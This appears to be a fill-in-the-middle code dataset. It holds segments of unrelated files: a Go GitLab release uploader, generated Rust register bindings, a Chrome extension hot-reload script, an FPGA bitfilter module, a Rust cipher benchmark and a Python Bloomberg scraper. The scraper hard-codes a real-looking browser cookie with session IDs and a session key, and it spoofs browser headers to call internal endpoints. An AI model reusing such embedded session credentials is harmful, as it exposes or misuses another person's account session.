repo config.Repo,
content []byte, // the content of the formula.rb
path, // the path to the formula.rb
message string, // the commit msg
) error {
fileName := path
// we assume the formula lives in the master branch only
ref := "master"
branch := "master"
opts := &gitlab.GetFileOptions{Ref: &ref}
castedContent := string(content)
projectID := repo.Owner + "/" + repo.Name
log.WithFields(log.Fields{
"owner": repo.Owner,
"name": repo.Name,
}).Debug("projectID at brew")
_, res, err := c.client.RepositoryFiles.GetFile(projectID, fileName, opts)
if err != nil && (res == nil || res.StatusCode != 404) {
log.WithFields(log.Fields{
"fileName": fileName,
"ref": ref,
"projectID": projectID,
"statusCode": res.StatusCode,
"err": err.Error(),
}).Error("error getting file for brew formula")
return err
}
log.WithFields(log.Fields{
"fileName": fileName,
"branch": branch,
"projectID": projectID,
}).Debug("found already existing brew formula file")
if res.StatusCode == 404 {
log.WithFields(log.Fields{
"fileName": fileName,
"ref": ref,
"projectID": projectID,
}).Debug("creating brew formula")
createOpts := &gitlab.CreateFileOptions{
AuthorName: &commitAuthor.Name,
AuthorEmail: &commitAuthor.Email,
Content: &castedContent,
Branch: &branch,
CommitMessage: &message,
}
fileInfo, res, err := c.client.RepositoryFiles.CreateFile(projectID, fileName, createOpts)
if err != nil {
log.WithFields(log.Fields{
"fileName": fileName,
"branch": branch,
"projectID": projectID,
"statusCode": res.StatusCode,
"err": err.Error(),
}).Error("error creating brew formula file")
return err
}
log.WithFields(log.Fields{
"fileName": fileName,
"branch": branch,
"projectID": projectID,
"filePath": fileInfo.FilePath,
}).Debug("created brew formula file")
return nil
}
log.WithFields(log.Fields{
"fileName": fileName,
"ref": ref,
"projectID": projectID,
}).Debug("updating brew formula")
updateOpts := &gitlab.UpdateFileOptions{
AuthorName: &commitAuthor.Name,
AuthorEmail: &commitAuthor.Email,
Content: &castedContent,
Branch: &branch,
CommitMessage: &message,
}
updateFileInfo, res, err := c.client.RepositoryFiles.UpdateFile(projectID, fileName, updateOpts)
if err != nil {
log.WithFields(log.Fields{
"fileName": fileName,
"branch": branch,
"projectID": projectID,
"statusCode": res.StatusCode,
"err": err.Error(),
}).Error("error updating brew formula file")
return err
}
log.WithFields(log.Fields{
"fileName": fileName,
"branch": branch,
"projectID": projectID,
"filePath": updateFileInfo.FilePath,
"statusCode": res.StatusCode,
}).Debug("updated brew formula file")
return nil
}
// CreateRelease creates a new release or updates it by keeping
// the release notes if it exists
func (c *gitlabClient) CreateRelease(ctx *context.Context, body string) (releaseID string, err error) {
title, err := tmpl.New(ctx).Apply(ctx.Config.Release.NameTemplate)
if err != nil {
return "", err
}
projectID := ctx.Config.Release.GitLab.Owner + "/" + ctx.Config.Release.GitLab.Name
log.WithFields(log.Fields{
"owner": ctx.Config.Release.GitLab.Owner,
"name": ctx.Config.Release.GitLab.Name,
}).Debug("projectID")
name := title
tagName := ctx.Git.CurrentTag
release, resp, err := c.client.Releases.GetRelease(projectID, tagName)
if err != nil && (resp == nil || resp.StatusCode != 403) {
return "", err
}
if resp.StatusCode == 403 {
log.WithFields(log.Fields{
"err": err.Error(),
}).Debug("get release")
description := body
ref := ctx.Git.Commit
gitURL := ctx.Git.URL
log.WithFields(log.Fields{
"name": name,
"description": description,
"ref": ref,
"url": gitURL,
}).Debug("creating release")
release, _, err = c.client.Releases.CreateRelease(projectID, &gitlab.CreateReleaseOptions{
Name: &name,
Description: &description,
Ref: &ref,
TagName: &tagName,
})
if err != nil {
log.WithFields(log.Fields{
"err": err.Error(),
}).Debug("error create release")
return "", err
}
log.WithField("name", release.Name).Info("release created")
} else {
desc := body
if release != nil && release.DescriptionHTML != "" {
desc = release.DescriptionHTML
}
release, _, err = c.client.Releases.UpdateRelease(projectID, tagName, &gitlab.UpdateReleaseOptions{
Name: &name,
Description: &desc,
})
if err != nil {
log.WithFields(log.Fields{
"err": err.Error(),
}).Debug("error update release")
return "", err
}
log.WithField("name", release.Name).Info("release updated")
}
return tagName, err // gitlab references a tag in a repo by its name
}
// Upload uploads a file into a release repository
func (c *gitlabClient) Upload(
ctx *context.Context,
releaseID string,
artifact *artifact.Artifact,
file *os.File,
) error {
projectID := ctx.Config.Release.GitLab.Owner + "/" + ctx.Config.Release.GitLab.Name
log.WithField("file", file.Name()).Debug("uploading file")
projectFile, _, err := c.client.Projects.UploadFile(
projectID,
file.Name(),
nil,
)
if err != nil {
return err
}
log.WithFields(log.Fields{
"file": file.Name(),
"url": projectFile.URL,
}).Debug("uploaded file")
gitlabBaseURL := ctx.Config.GitLabURLs.Download
// projectFile.URL from upload: /uploads/<hash>/filename.txt
linkURL := gitlabBaseURL + "/" + projectID + projectFile.URL
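	// e.g. (illustrative) https://gitlab.com/owner/repo/uploads/<hash>/file.txt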
name := artifact.Name
releaseLink, _, err := c.client.ReleaseLinks.CreateReleaseLink(
projectID,
releaseID,
&gitlab.CreateReleaseLinkOptions{
Name: &name,
URL: &linkURL,
})
if err != nil {
return RetriableError{err}
}
log.WithFields(log.Fields{
"id": releaseLink.ID,
"url": releaseLink.URL,
}).Debug("created release link")
fileUploadHash, err := extractProjectFileHashFrom(projectFile.URL)
if err != nil {
return err
}
// for checksums.txt the field is nil, so we initialize it
if artifact.Extra == nil {
artifact.Extra = make(map[string]interface{})
}
// we set this hash to be able to download the file
// in following publish pipes like brew, scoop
artifact.Extra["ArtifactUploadHash"] = fileUploadHash
return nil
}
// extractProjectFileHashFrom extracts the hash from the
// relative project file url of the format '/uploads/<hash>/filename.ext'
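// For example (illustrative hash):
//   extractProjectFileHashFrom("/uploads/66dbcd11ec5d24ed6ea225176098d52b/file.txt")
//   returns "66dbcd11ec5d24ed6ea225176098d52b"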
func extractProjectFileHashFrom(projectFileURL string) (string, error) | {
log.WithField("projectFileURL", projectFileURL).Debug("extract file hash from")
splittedProjectFileURL := strings.Split(projectFileURL, "/")
if len(splittedProjectFileURL) != 4 {
log.WithField("projectFileURL", projectFileURL).Debug("could not extract file hash")
return "", ErrExtractHashFromFileUploadURL
}
fileHash := splittedProjectFileURL[2]
log.WithFields(log.Fields{
"projectFileURL": projectFileURL,
"fileHash": fileHash,
}).Debug("extracted file hash")
return fileHash, nil
} |
|
dier.rs | #[doc = r" Value read from the register"]
pub struct R {
bits: u32,
}
#[doc = r" Value to write to the register"]
pub struct W {
bits: u32,
}
impl super::DIER {
#[doc = r" Modifies the contents of the register"]
#[inline]
pub fn modify<F>(&self, f: F)
where
for<'w> F: FnOnce(&R, &'w mut W) -> &'w mut W,
{
let bits = self.register.get();
let r = R { bits: bits };
let mut w = W { bits: bits };
f(&r, &mut w);
self.register.set(w.bits);
}
#[doc = r" Reads the contents of the register"]
#[inline]
pub fn read(&self) -> R {
R {
bits: self.register.get(),
}
}
#[doc = r" Writes to the register"]
#[inline]
pub fn write<F>(&self, f: F)
where
F: FnOnce(&mut W) -> &mut W,
{
let mut w = W::reset_value();
f(&mut w);
self.register.set(w.bits);
}
#[doc = r" Writes the reset value to the register"]
#[inline]
pub fn reset(&self) {
self.write(|w| w)
}
}
#[doc = r" Value of the field"]
pub struct TDER {
bits: bool,
}
impl TDER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct COMDER {
bits: bool,
}
impl COMDER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct CC1DER {
bits: bool,
}
impl CC1DER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct UDER {
bits: bool,
}
impl UDER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
| #[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct BIER {
bits: bool,
}
impl BIER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct TIER {
bits: bool,
}
impl TIER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct COMIER {
bits: bool,
}
impl COMIER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct CC1IER {
bits: bool,
}
impl CC1IER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Value of the field"]
pub struct UIER {
bits: bool,
}
impl UIER {
#[doc = r" Value of the field as raw bits"]
#[inline]
pub fn bit(&self) -> bool {
self.bits
}
#[doc = r" Returns `true` if the bit is clear (0)"]
#[inline]
pub fn bit_is_clear(&self) -> bool {
!self.bit()
}
#[doc = r" Returns `true` if the bit is set (1)"]
#[inline]
pub fn bit_is_set(&self) -> bool {
self.bit()
}
}
#[doc = r" Proxy"]
pub struct _TDEW<'a> {
w: &'a mut W,
}
impl<'a> _TDEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 14;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _COMDEW<'a> {
w: &'a mut W,
}
impl<'a> _COMDEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 13;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _CC1DEW<'a> {
w: &'a mut W,
}
impl<'a> _CC1DEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 9;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _UDEW<'a> {
w: &'a mut W,
}
impl<'a> _UDEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 8;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _BIEW<'a> {
w: &'a mut W,
}
impl<'a> _BIEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 7;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _TIEW<'a> {
w: &'a mut W,
}
impl<'a> _TIEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 6;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _COMIEW<'a> {
w: &'a mut W,
}
impl<'a> _COMIEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 5;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _CC1IEW<'a> {
w: &'a mut W,
}
impl<'a> _CC1IEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 1;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
#[doc = r" Proxy"]
pub struct _UIEW<'a> {
w: &'a mut W,
}
impl<'a> _UIEW<'a> {
#[doc = r" Sets the field bit"]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r" Clears the field bit"]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r" Writes raw bits to the field"]
#[inline]
pub fn bit(self, value: bool) -> &'a mut W {
const MASK: bool = true;
const OFFSET: u8 = 0;
self.w.bits &= !((MASK as u32) << OFFSET);
self.w.bits |= ((value & MASK) as u32) << OFFSET;
self.w
}
}
impl R {
#[doc = r" Value of the register as raw bits"]
#[inline]
pub fn bits(&self) -> u32 {
self.bits
}
#[doc = "Bit 14 - Trigger DMA request enable"]
#[inline]
pub fn tde(&self) -> TDER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 14;
((self.bits >> OFFSET) & MASK as u32) != 0
};
TDER { bits }
}
#[doc = "Bit 13 - COM DMA request enable"]
#[inline]
pub fn comde(&self) -> COMDER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 13;
((self.bits >> OFFSET) & MASK as u32) != 0
};
COMDER { bits }
}
#[doc = "Bit 9 - Capture/Compare 1 DMA request enable"]
#[inline]
pub fn cc1de(&self) -> CC1DER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 9;
((self.bits >> OFFSET) & MASK as u32) != 0
};
CC1DER { bits }
}
#[doc = "Bit 8 - Update DMA request enable"]
#[inline]
pub fn ude(&self) -> UDER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 8;
((self.bits >> OFFSET) & MASK as u32) != 0
};
UDER { bits }
}
#[doc = "Bit 7 - Break interrupt enable"]
#[inline]
pub fn bie(&self) -> BIER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 7;
((self.bits >> OFFSET) & MASK as u32) != 0
};
BIER { bits }
}
#[doc = "Bit 6 - Trigger interrupt enable"]
#[inline]
pub fn tie(&self) -> TIER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 6;
((self.bits >> OFFSET) & MASK as u32) != 0
};
TIER { bits }
}
#[doc = "Bit 5 - COM interrupt enable"]
#[inline]
pub fn comie(&self) -> COMIER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 5;
((self.bits >> OFFSET) & MASK as u32) != 0
};
COMIER { bits }
}
#[doc = "Bit 1 - Capture/Compare 1 interrupt enable"]
#[inline]
pub fn cc1ie(&self) -> CC1IER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 1;
((self.bits >> OFFSET) & MASK as u32) != 0
};
CC1IER { bits }
}
#[doc = "Bit 0 - Update interrupt enable"]
#[inline]
pub fn uie(&self) -> UIER {
let bits = {
const MASK: bool = true;
const OFFSET: u8 = 0;
((self.bits >> OFFSET) & MASK as u32) != 0
};
UIER { bits }
}
}
impl W {
#[doc = r" Reset value of the register"]
#[inline]
pub fn reset_value() -> W {
W { bits: 0 }
}
#[doc = r" Writes raw bits to the register"]
#[inline]
pub unsafe fn bits(&mut self, bits: u32) -> &mut Self {
self.bits = bits;
self
}
#[doc = "Bit 14 - Trigger DMA request enable"]
#[inline]
pub fn tde(&mut self) -> _TDEW {
_TDEW { w: self }
}
#[doc = "Bit 13 - COM DMA request enable"]
#[inline]
pub fn comde(&mut self) -> _COMDEW {
_COMDEW { w: self }
}
#[doc = "Bit 9 - Capture/Compare 1 DMA request enable"]
#[inline]
pub fn cc1de(&mut self) -> _CC1DEW {
_CC1DEW { w: self }
}
#[doc = "Bit 8 - Update DMA request enable"]
#[inline]
pub fn ude(&mut self) -> _UDEW {
_UDEW { w: self }
}
#[doc = "Bit 7 - Break interrupt enable"]
#[inline]
pub fn bie(&mut self) -> _BIEW {
_BIEW { w: self }
}
#[doc = "Bit 6 - Trigger interrupt enable"]
#[inline]
pub fn tie(&mut self) -> _TIEW {
_TIEW { w: self }
}
#[doc = "Bit 5 - COM interrupt enable"]
#[inline]
pub fn comie(&mut self) -> _COMIEW {
_COMIEW { w: self }
}
#[doc = "Bit 1 - Capture/Compare 1 interrupt enable"]
#[inline]
pub fn cc1ie(&mut self) -> _CC1IEW {
_CC1IEW { w: self }
}
#[doc = "Bit 0 - Update interrupt enable"]
#[inline]
pub fn uie(&mut self) -> _UIEW {
_UIEW { w: self }
}
} | self.bits
}
|
hot-reload.js | const filesInDirectory = (dir) =>
new Promise((resolve) =>
dir.createReader().readEntries((entries) =>
Promise.all(
entries
.filter((e) => e.name[0] !== ".")
.map((e) =>
e.isDirectory
? filesInDirectory(e)
: new Promise((resolve) => e.file(resolve))
)
)
.then((files) => [].concat(...files))
.then(resolve)
)
);
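// Build a single change-detection token by concatenating every file's name
// and last-modified date; any added, removed, or touched file changes it.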
const timestampForFilesInDirectory = (dir) =>
filesInDirectory(dir).then((files) =>
files.map((f) => f.name + f.lastModifiedDate).join() | timestampForFilesInDirectory(dir).then((timestamp) => {
if (!lastTimestamp || lastTimestamp === timestamp) {
setTimeout(() => watchChanges(dir, timestamp), 1000); // retry after 1s
} else {
chrome.runtime.reload();
}
});
};
chrome.management.getSelf((self) => {
if (self.installType === "development") {
chrome.runtime.getPackageDirectoryEntry((dir) => watchChanges(dir));
chrome.tabs.query({ active: true, lastFocusedWindow: true }, (tabs) => {
// NB: see https://github.com/xpl/crx-hotreload/issues/5
if (tabs[0]) {
chrome.tabs.reload(tabs[0].id);
}
});
}
}); | );
const watchChanges = (dir, lastTimestamp) => { |
bitfilter.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017-2020 The Project X-Ray Authors.
#
# Use of this source code is governed by a ISC-style
# license that can be found in the LICENSE file or at
# https://opensource.org/licenses/ISC
#
# SPDX-License-Identifier: ISC
from prjxray.util import OpenSafeFile
class Bitfilter(object):
def | (
self, frames_to_include=None, frames_to_exclude=[],
bits_to_exclude=[]):
self.frames_to_include = frames_to_include
self.frames_to_exclude = frames_to_exclude
self.bits_to_exclude = bits_to_exclude
def filter(self, frame, bit):
if self.frames_to_include is not None:
if frame in self.frames_to_include:
return True
if frame in self.frames_to_exclude:
return False
if (frame, bit) in self.bits_to_exclude:
return False
return True
BITFILTERS = {
('artix7', 'INT'):
Bitfilter(
frames_to_exclude=[
30,
31,
],
bits_to_exclude=[
#
(0, 36)
]),
}
def get_bitfilter(part, tile):
""" Returns bitfilter for specified part and tile.
Either returns bitfilter to specified part and tile type, or the default
bitfilter, which includes all bits.
"""
key = (part, tile)
if key in BITFILTERS:
return BITFILTERS[key].filter
else:
return None
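# Illustrative usage (values taken from the BITFILTERS table above);
# a result of None means "keep every bit":
#
# flt = get_bitfilter('artix7', 'INT')
# keep = flt(30, 0) if flt is not None else True  # frame 30 is excluded -> False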
| __init__ |
bloomberg-api.py | import requests
import json
from datetime import datetime
import os
REQUEST_HEADERS = {
'authority': 'www.bloomberg.com',
'cache-control': 'max-age=0',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-gpc': '1',
'sec-fetch-site': 'none',
'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'accept-language': 'en-US,en;q=0.9',
'cookie': 'agent_id=9f2bb4ef-7f2c-4837-8414-1adec058b7af; session_id=75e8806c-c818-4cfa-bc14-ffad41c591ad; session_key=cedbe85aa42ce389de11f95467b8511719ac1286; gatehouse_id=3a08ccd6-8ec7-4e6f-bade-70f0296e8f02; geo_info=%7B%22countryCode%22%3A%22DE%22%2C%22country%22%3A%22DE%22%2C%22field_n%22%3A%22cp%22%2C%22trackingRegion%22%3A%22Europe%22%2C%22cacheExpiredTime%22%3A1637767817335%2C%22region%22%3A%22Europe%22%2C%22fieldN%22%3A%22cp%22%7D%7C1637767817335; _pxvid=41425bb6-47bd-11ec-af6d-5244734f5643; _sp_v1_uid=1:444:3e22b8d4-371e-48fa-aeba-4be890c01d4f; _sp_v1_ss=1:H4sIAAAAAAAAAItWqo5RKimOUbLKK83J0YlRSkVil4AlqmtrlXQGVlk0kYw8EMOgNhaXkfSQUIoFAORdi1xUAQAA; _sp_v1_csv=null; _sp_v1_lt=1:; ccpaUUID=ec9c365a-fe56-4ca0-9af9-0824a3e25686; dnsDisplayed=true; ccpaApplies=true; signedLspa=false; _sp_krux=true; consentUUID=b6028d5a-191a-4417-a42a-9c0b5031c567_1; euconsent-v2=CPP02HiPP02HiAGABCENB1CgAP_AAGPAAAYgH9oB9CpGCTFDKGh4AIsAEAQXwBAEAOAAAAABAAAAAAgQAIwCAEASAACAAAACAAAAIAIAAAAAEAAAAAAAQAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAIEAAAAAAUAAABAAgEAAABIAQAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgYtARAAcACEAHIAPwAvgCOAIHAQcBCACIgEWALqAYEA14B1AFlALzAYsAUMgCABMAEcARwBeYSAoAAsACoAGQAOAAgABkADSAIgAigBMACeAH4AQgAjgBSgDKAHeAPYAjgBKQGSCoAoATABHAEcAU2AvMdAYAAWABUADIAHAAQAAuABkADSAIgAigBMACeAGIAPwAjgBMACjAFKAMoAd4A9gCOAEpAOoAyQcABAAuQgFAALAAyAC4AJgAYgBHADvAI4ASkA6hKAYAAsADIAHAAiABMADEAI4AUYApQB3gEcAOoSAAgAXKQEwAFgAVAAyABwAEAAMgAaQBEAEUAJgATwAxAB-AFGAKUAZQA7wCOAEpAZIUABAAXAJ2AAA.YAAAAAAAAAAA; consentUUID=b6028d5a-191a-4417-a42a-9c0b5031c567_1; _sp_v1_data=2:392777:1637163871:0:1:-1:1:0:0:_:-1; _sp_v1_opt=1:login|true:last_id|11:; _sp_v1_consent=1\u00210:-1:-1:-1:-1:-1; bbgconsentstring=req1fun1pad1; bdfpc=004.0798118908.1637163875871; _gcl_au=1.1.1720942935.1637163876; _uetvid=44e8114047bd11ec92b22f9017b0ecd7; _ga=GA1.2.1490423973.1637163877; _rdt_uuid=1637163877464.5392f96e-6945-409f-b570-c991ab7f3ac3; _scid=4cb379ec-1c36-4923-830a-f3d912592400; _parsely_visitor={%22id%22:%22pid=ec7166d70d0618210d77ec91c9ff47fc%22%2C%22session_count%22:1%2C%22last_session_ts%22:1637163878100}; _fbp=fb.1.1637163878386.322604158; __gads=ID=780c8d3c1717c19b:T=1637163876:S=ALNI_MYhi11N9mUsWpAG6mTst5btaNzE1w; _lc2_fpi=b1166d620485--01fmq94jsganf9p3gdwdy59x2d; _cc_id=c7ad973acd6d72e5dd868e2f901ccdb4; _cc_cc=ACZ4XmNQSDZPTLE0N05MTjFLMTdKNU1JsTCzSDVKszQwTE5OSTJhAILEqcrpIBoChLec3aPDeCiO4T8jI8PWlfelYezNSOxNSOzlt2eKw9QsRBJfux6h98oqBHvbWgT7%2BKYpLDC9Hz9bwpjnjh5ihrHPL54DV3Lj1CM2mPglJPZhJDXTT6jDlPzu6oL7ZM2Gp9wwcQAeRl6M; _cc_aud=ABR4XmNgYGBInKqcDqQggJmBNbMIxGTNLARRXOV3gSQAUxcEoQ%3D%3D',
'if-none-match': 'W/"a43-hxXAwL51kj9ckR6Knjaq6P7qNF8"',
}
SEARCH_RESPONSE_SAVE_DIR = "search_responses"
FINDATA_RESPONSE_SAVE_DIR = "findata_responses"
class moduleUtils():
"""class name gives it away"""
def save_bloomberg_ticker(ticker: str):
"""function to save the ticker for future financial-data-API requests. To skip the
get_bloomberg_ticker() method when possible. Will be written to bloomberg_tickers.txt"""
pass
def get_api_no_header(url: str):
"""utils. gets and parses json-response. Yes, this is OOP hell"""
response = requests.get(url)
response_dict = response.json()
return response_dict
def check_if_query_already_saved(query: str):
"""takes bloomberg-ticker and checks, if bloomberg-search-API call is needed or ticker has been"""
pass
    def safe_save_jsondict(dir: str, json_dict: dict):
        """archives response, even if dir isn't created yet."""
        tag = datetime.now().strftime("%y%m%d_%H%M%S")
        os.makedirs(dir, exist_ok=True)
        with open(os.path.join(dir, f"{tag}.json"), "w") as f:
            f.write(json.dumps(json_dict))
def save_json_response(json_response: dict, response_type: str):
"""saves dict from API json response neatly. Second arg needs to be either "search" or "financial"."""
if response_type == "search":
moduleUtils.safe_save_jsondict(SEARCH_RESPONSE_SAVE_DIR, json_response)
elif response_type == "findata":
moduleUtils.safe_save_jsondict(FINDATA_RESPONSE_SAVE_DIR, json_response)
else:
print("save_json_response() seems response_type doesn't fit.")
class bloombergAPI():
"""core functions of the module"""
def get_bloomberg_ticker(query: str):
|
def get_bloomberg_financials(ticker: str):
"""this method takes a bloomberg-ticker to get bloomberg data-strip-API financial data. Returns
dict with all the data"""
url = f"https://www.bloomberg.com/markets2/api/datastrip/{ticker}?locale=en"
response = requests.get(url, headers=REQUEST_HEADERS)
response_dict = json.loads(response.text)[0]
return response_dict
query = "peloton"
num_finds, search_response_unformatted, first_find_unformatted, ticker, query = bloombergAPI.get_bloomberg_ticker(query)
findata_response = bloombergAPI.get_bloomberg_financials(ticker)
print(findata_response)
moduleUtils.save_json_response(search_response_unformatted, "search")
moduleUtils.save_json_response(findata_response, "findata")
| """sends GET request to bloomberg.com search API with operator "query" as query. To find non-general,
specific finds, please consult list_dicts_finds output"""
formatted_query = query.replace(" ", "%20")
url = f"https://search.bloomberg.com/lookup.json?query={formatted_query}"
response_dict = moduleUtils.get_api_no_header(url)
num_finds = response_dict.get("total_results")
first_find_unformatted = response_dict.get("results")[0]
bloomberg_ticker = response_dict.get("results")[0].get("ticker_symbol")
return num_finds, response_dict, first_find_unformatted, bloomberg_ticker, query |
lib.rs | #![no_std]
#![feature(test)]
extern crate kuznyechik;
extern crate test;
extern crate block_cipher_trait; | use test::Bencher;
use block_cipher_trait::{BlockCipher, BlockCipherFixKey};
use generic_array::GenericArray;
#[bench]
pub fn encrypt(bh: &mut Bencher) {
let key = Default::default();
let state = kuznyechik::Kuznyechik::new(&key);
let data = [1u8; 16];
let input = GenericArray::from_slice(&data);
let mut output = GenericArray::default();
bh.iter(|| {
state.encrypt_block(input, &mut output);
});
bh.bytes = 16u64;
} | extern crate generic_array;
|
palcomp3.py | # coding: utf-8
